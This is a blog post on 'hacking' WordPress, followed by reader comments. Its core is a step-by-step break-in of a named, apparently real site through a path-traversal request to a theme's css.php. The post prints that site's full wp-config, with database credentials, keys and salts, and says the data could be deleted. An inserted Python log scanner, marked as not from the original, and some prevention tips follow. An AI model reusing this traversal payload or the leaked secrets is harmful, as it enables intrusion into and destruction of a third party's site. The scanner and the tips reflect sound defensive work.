How do you hack WordPress?

This can be done in MANY different ways, depending on what you mean by “hack” and what you are trying to accomplish. Let's clear up what the word hack actually means. A “hacker” is someone who is a clever programmer, a “hack” is a clever solution to a programming problem, and “hacking” is the act of doing it. By this definition, when you ask how to hack WordPress, you are saying that you have a programming problem that needs to be solved in a clever way.

Unfortunately, the term “hacking” has been confused with “cracking”. Cracking is the act of breaking into a computer system. A “cracker” is typically a kind of hacker who has proficient technical knowledge of security systems. They will use this knowledge to break into a computer system.

So what are you wanting to do? Hack or Crack?

If you want to hack WordPress, you want to modify it to do something that it does not already offer. An example of this might be that you wish to have a live chat system. By creating this system and integrating it into WordPress, you have technically hacked it. Think of plugins, for example. They were created outside of WordPress but in a way that lets them be added, giving additional functionality to the web platform.

Going by the most popular use of the term hack, I will assume you actually want to crack WordPress. So how do you do this? How can you break into someone's WordPress site?

Cracking WordPress

The following steps can be used for good or evil.  It is up to you to decide how they are used.

  1. Find a WordPress-based site that you want to crack. I will use: http://apostolicclassics.net/ .
  2. Now you need to find vulnerable parameters on the site. Go to the site, then right-click on the page and choose View Source. This shows you the actual code of the website.
  3. One of the parameters is showing inner directories: http://apostolicclassics.net/wp-content/themes/eleven40/style.css?ver=2.4.2 .
  4. This means the site has an LFD (Local File Disclosure) vulnerability, allowing you to see the website's directory content.
  5. You can now use software such as Acunetix Scanner to find a vulnerable path.
  6. Start by getting a list of all their installed plugins. Plugins and themes are the first places to start looking for exploits. Keep this in mind when you are installing these on your own site. Do your research!
  7. Search Google for “exploits” followed by the plugin names to determine if the plugin has any known security issues.
  8. On this site they have a plugin called wp-mobile-edition. Looking this up in Google shows that there are now known exploits for this plugin!
  9. Another route is the themes they are using. Inside their mTheme-Unus, there is a css.php file: http://apostolicclassics.net/wp-content/themes/mTheme-Unus/css/css.php
  10. Now I try to access other files through this by appending to the URL string. After a few tries I landed on appending ?files=../../../../wp-config.php to the URL. The whole URL now looks like: http://apostolicclassics.net/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php .
  11. We can now see what is inside their wp-config file:
  12. <?phpdefine('FLYWHEEL_CONFIG_DIR', dirname(__FILE__) .
     '/flywheel-config');define('FLYWHEEL_PLUGIN_DIR', FLYWHEEL_CONFIG_DIR .
     '/plugins');define('FLYWHEEL_DEFAULT_PROTOCOL', 'http://');define('WPMU_PLUGIN_DIR', dirname(__FILE__) .
     '/wp-content/mu-plugins');define('WPMU_PLUGIN_URL', '/wp-content/mu-plugins');define('FS_METHOD', 'direct');define('WP_POST_REVISIONS',10);define('WP_MEMORY_LIMIT', '200M')
    ;define('DB_NAME', 'wp4735');define('DB_USER', 'wp4735');define('DB_PASSWORD', 'Pl5Gznca3hLPkD8xidViSRcRolxMTj');define('DB_HOST', '127.0.0.1');define('DB_CHARSET', 'utf8')
    ;define('DB_COLLATE', '');$table_prefix= 'wp_';define('AUTH_KEY', 'T/k#-=bjczXG-D-^|~l8ST+{%*e*8jtj<MdM#U8@0~AOmBzRX-dvZ^$)pN{=<b[7')
    ;define('SECURE_AUTH_KEY','XVBzs%OWCST{ex`K6Z _ CXQV=o]Nw.o:I_X_vI1q46!(5%QB-a}@HEd;AHN>Pnm');define('LOGGED_IN_KEY','DzMfZQ-Y7-kQwr4=|1,gl=`-BvH_9lna!@1}a_D(yOSQll+w3mP$$N?+Y5%q>yYz')
    ;define('NONCE_KEY','I_^{yONUF(+v0c^`Mqp3(s^G.t|eJr/,>yEnUXTP7WE_QQF5=z:6r+9)s,kx{Q<>');define('AUTH_SALT','U.+]gY[C_JBE*-~g/Grjnhadi`[/mEacbZ%l&?[NX9JPm7B+{<< +}blX54jT@b+')
    ;define('SECURE_AUTH_SALT', 'p>P>;GO=Dc;-xdZ*AY`-qx[_YnDNI`ikdyXj_GGS-ZH!ro}UasMD_nS$L$:g#; O')
    ;define('LOGGED_IN_SALT', '[e@Du dCZ<0ND-l>F}^-hqq(edkMJ6[=Bv3R*(|bA?X_ygP:u1+EaG%To%EW WMf')
    ;define('NONCE_SALT', 'J52fOcjw3`p;/#&@T=6W>]Ev4_ -.aw1=PJ(JM|t=0m~[0)|!S;&%JumJR._$94?');define('WPLANG', '');define('WP_DEBUG', false)
    ;define('WP_CACHE', false);define('WP_AUTO_UPDATE_CORE', false);if ( !defined('ABSPATH') )define('ABSPATH', dirname(__FILE__) . '/')
    ;if ( array_key_exists('HTTP_X_FORWARDED_PROTO', $_SERVER) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https' )$_SERVER['HTTPS']='on';require_once(ABSPATH . 'wp-settings.php');
  13. If you look at the data, you can see that we just found out some very important information:

The Database Username: wp4735

The Database Password: Pl5Gznca3hLPkD8xidViSRcRolxMTj

The Database Hostname: 127.0.0.1

With this information, I can access their database. I could delete all their data, or corrupt it. I could populate it with my own data. If they do not back up their database, they could potentially lose all their hundreds of posts if I were malicious! Keep in mind that this process worked in this instance, but depending on the technology used, this process will change dramatically. That is why having an in-depth knowledge of these technologies is important to be a good hacker or cracker.

So why am I teaching you this? Well, because this knowledge can be used for good or for bad. It is better that you understand how this works so you can better prevent it from happening to you!

I have had WordPress sites and forums get cracked before and had all my data deleted.  This is a really bad day! So how can you prevent this from happening to your site?

  1. Research any theme or plugin you use for known security exploits.
  2. Keep WordPress, themes, and plugins up to date.
  3. Make sure you have a plugin that will automatically back up your WHOLE site and database frequently to another location.
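
To go with the prevention steps above, the request from step 10 (a `files=` parameter carrying `../` sequences) leaves a recognizable trace in the web server's access log. The following is an added example, not code from the original post: a Python scan of combined-format access logs that flags traversal attempts in query parameters, including percent-encoded ones. The log lines, the `example-theme` path, the watch list and the function names are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in "combined" access-log format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2016:10:01:02 +0000] "GET /wp-content/themes/example-theme/css/css.php?files=../../../../wp-config.php HTTP/1.1" 200 3120 "-" "curl/7.47"
203.0.113.7 - - [12/Mar/2016:10:01:09 +0000] "GET /wp-content/themes/example-theme/css/css.php?files=..%252f..%252fwp-config.php HTTP/1.1" 404 210 "-" "curl/7.47"
198.51.100.4 - - [12/Mar/2016:10:02:00 +0000] "GET /wp-content/themes/example-theme/style.css?ver=2.4.2 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2016:10:03:00 +0000] "GET /wp-content/themes/example-theme/css/css.php?files=../../../../etc/passwd HTTP/1.1" 403 199 "-" "Mozilla/5.0"
"""

# Captures: client IP, method, request target, status code.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SENSITIVE = ("wp-config.php", "/etc/passwd", ".htaccess")  # assumed watch list


def fully_decode(value, rounds=3):
    """Undo nested percent-encoding, e.g. %252f -> %2f -> /."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_traversal(log_text):
    """Return one finding per query parameter that carries a ../ sequence."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(3), int(m.group(4))
        parts = urlsplit(target)
        # parse_qsl decodes once; fully_decode handles double encoding.
        for name, raw in parse_qsl(parts.query, keep_blank_values=True):
            value = fully_decode(raw).replace("\\", "/")
            if "../" not in value:
                continue
            sensitive = any(s in value.lower() for s in SENSITIVE)
            # A 2xx reply to a traversal naming a sensitive file is triaged first.
            hit = sensitive and 200 <= status < 300
            findings.append({"ip": ip, "path": parts.path, "param": name,
                             "decoded": value, "status": status,
                             "severity": "likely-disclosure" if hit else "probe"})
    return findings


if __name__ == "__main__":
    for f in find_traversal(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["path"], f["param"], f["decoded"], f["status"])
```

A `likely-disclosure` hit for `wp-config.php` means the database password and the keys and salts in that file should be treated as exposed and rotated.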

 

9 thoughts on “How do you hack WordPress?”

  1. How do you find a plugin to do the backup? Maybe you could tell us that next week. I was wondering about adding PayPal as a plugin but thought it might be crackable. Does an SSL certificate solve all that?

    1. WordPress is a very popular CMS, making it the victim of many different types of attacks. Nothing is ever perfectly secure but you can expect someone will eventually try and mess with your site. Best not to leave doors wide open for them!

  2. Very interesting and scary to think about. It is good to be informed and to have a plan in case something like this were to happen. Do you have any recommendations for plugins that will automatically backup your whole site and database?

  3. Hi Micah,

    I’m not sure how I feel about this information being so openly shared, but you make a great point to prioritize the security of any plug-ins to make sure they are up to date, having a back-up system in place and being diligent about your site’s security. If this hacking knowledge is so readily available, we should all invest in security strategies.

    Thanks for bringing this to our attention.

  4. Thanks for the breakdown on Hacking and Cracking. I wasn’t using the right terms when talking about them. I thought Hacking and Cracking were the same. Good to know, never hurts to be prepared for hackers.
